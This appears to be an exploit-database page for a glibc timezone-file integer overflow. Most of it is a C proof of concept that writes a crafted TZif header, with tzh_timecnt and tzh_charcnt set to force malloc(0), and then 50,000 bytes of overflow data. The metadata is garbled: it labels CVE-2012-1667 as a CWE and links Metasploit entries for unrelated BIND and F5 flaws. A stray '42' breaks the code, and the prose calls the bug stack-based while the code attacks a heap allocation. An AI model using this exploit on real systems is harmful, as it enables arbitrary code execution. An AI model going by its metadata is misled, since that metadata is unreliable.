header-logo
Suggest Exploit
vendor:
glibc
by:
SecurityFocus
7.5
CVSS
HIGH
Integer-Overflow
190
CWE
Product Name: glibc
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2012-1667
CPE: a:gnu:glibc
Metasploit: https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2013-1667/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0685/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2013-0746/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-6329/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-5195/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-5526/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0716/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1110/https://www.rapid7.com/db/vulnerabilities/suse-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/apple-osx-note-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0717/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/apple-osx-bind-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-1ecc0d3f-ae8e-11e1-965b-0024e88a8c98/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-fc5231b6-c066-11e1-b5e0-000c299b62e1/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/vmsa-2012-0016-cve-2012-1667/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2012-1667/https://www.rapid7.com/db/?q=CVE-2012-1667&type=&page=2https://www.rapid7.com/db/?q=CVE-2012-1667&type=&page=2
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2012

GNU glibc Remote Integer-Overflow Vulnerability

GNU glibc is prone to an remote integer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library. The vulnerability is caused by a boundary error when handling timezone information. This can be exploited to cause a stack-based buffer overflow by supplying a specially crafted timezone information file.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/50898/info

GNU glibc is prone to an remote integer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that uses the affected library. 

#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>
 
#define TZ_MAGIC        "TZif"
 
#define PUT_32BIT_MSB(cp, value)                                        \
        do {                                                            \
                (cp)[0] = (value) >> 24;                                \
                (cp)[1] = (value) >> 16;                                \
                (cp)[2] = (value) >> 8;                                 \
                (cp)[3] = (value);                                      \
        } while (0)
 
struct tzhead {
        char    tzh_magic[4];
        char    tzh_version[1];
        char    tzh_reserved[15];
        char    tzh_ttisgmtcnt[4];
        char    tzh_ttisstdcnt[4];
        char    tzh_leapcnt[4];
        char    tzh_timecnt[4];
        char    tzh_typecnt[4];
        char    tzh_charcnt[4];
};
 
struct ttinfo
  {
    long int offset;
    unsigned char isdst;
    unsigned char idx;
    unsigned char isstd;
    unsigned char isgmt;
  };
int main(void)
{
        struct tzhead evil;
        int i;
        char *p;
42
        uint32_t total_size;
        uint32_t evil1, evil2;
 
        /* Initialize static part of the header */
        memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
        evil.tzh_version[0] = 0;
        memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
        memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
        memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
        memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
        memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
 
        /* Initialize nasty part of the header */
        evil1 = 500;
        PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
 
        total_size = evil1 * (sizeof(time_t) + 1);
        total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                & ~(__alignof__ (struct ttinfo) - 1));
 
        /* value of chars, to get a malloc(0) */
        evil2 = 0 - total_size;
        PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
        p = (char *)&evil;
        for (i = 0; i < sizeof(evil); i++)
                printf("%c", p[i]);
 
        /* data we overflow with */
        for (i = 0; i < 50000; i++)
                printf("A");
}